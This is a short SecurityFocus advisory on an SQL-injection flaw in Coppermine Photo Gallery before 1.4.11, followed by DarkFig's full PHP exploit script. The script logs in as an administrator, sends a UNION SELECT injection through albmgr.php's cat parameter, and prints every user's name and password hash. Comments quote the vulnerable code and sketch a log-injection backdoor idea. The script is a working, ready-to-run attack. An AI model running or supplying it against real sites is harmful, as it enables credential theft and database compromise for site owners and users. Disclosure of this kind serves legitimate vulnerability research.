source: https://www.securityfocus.com/bid/21894/info
Coppermine Photo Gallery is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Coppermine Photo Gallery versions prior to 1.4.11 are vulnerable.
#!/usr/bin/php
<?php
/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");
if($argc < 4)
{
print
"\n---------------------------------------------------------";
print "\nAffected.scr..: Coppermine Photo Gallery <= 1.4.10";
print "\nPoc.ID........: 19070104";
print "\nType..........: SQL Injection";
print "\nRisk.level....: Medium";
print "\nSrc.download..: coppermine-gallery.net";
print "\nPoc.link......: acid-root.new.fr/poc/19070104.txt";
print "\nCredits.......: DarkFig";
print
"\n---------------------------------------------------------";
print "\nUsage.........: php xpl.php <url> <adminuser>
<adminpass>";
print "\nProxyOptions..: <proxhost:proxport>
<proxuser:proxpass>";
print "\nExample.......: php xpl.php http://c.com/ admin
passwd";
print
"\n---------------------------------------------------------\n";
exit(1);
}
/*/
[0] => xpl.php [1] => http://localhost/cpg1410/
[2] => root [3] => toor
[4] => localhost:8200 [5] => user:passwd
/*/
$url=$argv[1];$adu=$argv[2];
$adp=$argv[3];$pxs=$argv[4];
$pxa=$argv[5];
$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
if(!empty($pxs)){
print "\nstatus> Using a proxy $pxs";
$xpl->proxy($pxs);
}
if(!empty($pxa)){
print "\nstatus> Basic proxy authentification $pxa";
$xpl->proxyauth($pxa);
}
/*/
Table prefix.
/*/
print "\nstatus> Searching the version";
$xpl->get($url.'include/index.html');
if(preg_match("#Coppermine version:
([0-9]*\.[0-9]*\.[0-9]*)#",$xpl->getcontent(),$matches)) print
"\nsploit> Coppermine version ".$matches[1];
else print "\nsploit> Not found";
$table = !empty($matches[1]) ?
'cpg'.str_replace('.','',$matches[1]).'_users' : 'cpg1410_users';
/*/
If you have the admin cookie (but not the password),
replace lines 73=>76 by $xpl->addcookie('yourcookie');
/*/
print "\nstatus> Trying to get logged in";
$xpl->post($url."login.php?referer=index.php","username=$adu&password=$adp&remember_me=1&submitted=Se+Connecter");
if(!preg_match("#color:red#",$xpl->getcontent())) print "\nsploit>
Done";
else die("\nstatus> Exploit failed\n");
/*/
(usermgr.php)
=============
case 'group_alb_access' :
if (isset($_GET['gid'])) $group_id = $_GET['gid'];
$sql = "SELECT group_name FROM [...] WHERE group_id = $group_id
[...]";
$result = cpg_db_query($sql);
(db_ecard.php)
==============
$start = isset($_REQUEST['start']) ? $_REQUEST['start'] : ''; [...]
if (!$start) {$startFrom = '0';}else{$startFrom=$start;} [...]
$result = cpg_db_query("SELECT [...] ORDER BY $sortBy $sortDirection
LIMIT $startFrom,$countTo");
(albmgr.php)
============
$cat = isset($_GET['cat']) ? ($_GET['cat']) : 0;
if ($cat == 1) $cat = 0;
if (GALLERY_ADMIN_MODE) {
$result = cpg_db_query("SELECT [...] WHERE category = $cat ORDER BY
pos ASC");
(filename_to_title())
=====================
$albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0;
$albstr = ($albumid) ? " WHERE aid = $albumid" : ''; [...]
$result = cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']}
$albstr");
(del_titles())
==============
$albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0;
$albstr = ($albumid) ? " WHERE aid = $albumid" : '';
$result = cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']}
$albstr");
/*/
print "\nstatus> Retrieving all members password";
$xpl->get($url."albmgr.php?cat=-1/**/union/**/select/**/user_name,user_password/**/from/**/$table/*");
if(preg_match_all("#<option
value=\"album_no=(.*),album_nm='([a-z0-9]{32})'#",$xpl->getcontent(),$matches))
print "\nsploit> Done";
else die("\nstatus> Exploit failed\n");
print "\nsploit> +----------------------------------+----------+";
print "\nsploit> | PASSWORD | USER |";
print "\nsploit> +----------------------------------+----------+";
/*/
(init.inc.php)
==============
$HTML_SUBST = array('&' => '&', '"' => '"', '<' => '<',
'>' => '>', '%26' => '&', '%22' => '"', '%3C' => '<',
'%3E' =>
'>','%27' => ''', "'" => ''');
[...]
if (is_array($_POST)) { // and GET, SERVER, REQUEST...
foreach ($_POST as $key => $value) {
if (!is_array($value))
$_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);
if (!in_array($key, $keysToSkip) && isset($$key)) unset($$key);
}
... that's why we use the html_entity_decode() function.
I just wanted < for a remote php code execution sploit without admin
rights :'(.
When the admin view the security logs, it include
"security.log.php"...
(security.log.php)
==================
[...]
if (!defined('IN_COPPERMINE')) die(); ?>
Denied privileged access to viewlog.php from user Guest at on January
4, 2007, 2:10 pm
Failed login attempt with Username: <?php mail(you); [...]
fwrite(backdoor.php); [...] /* from IP 127.0.0.1 on Jan 04, 2007 at
01:16 PM
/*/
for($i=0;$i<count($matches[0]);$i++)
{
print "\nsploit> | ".$matches[2][$i].' |
'.html_entity_decode($matches[1][$i]);
if($i==(count($matches[0])-1)){
print "\nsploit>
+----------------------------------+----------+\n";
}
}
?>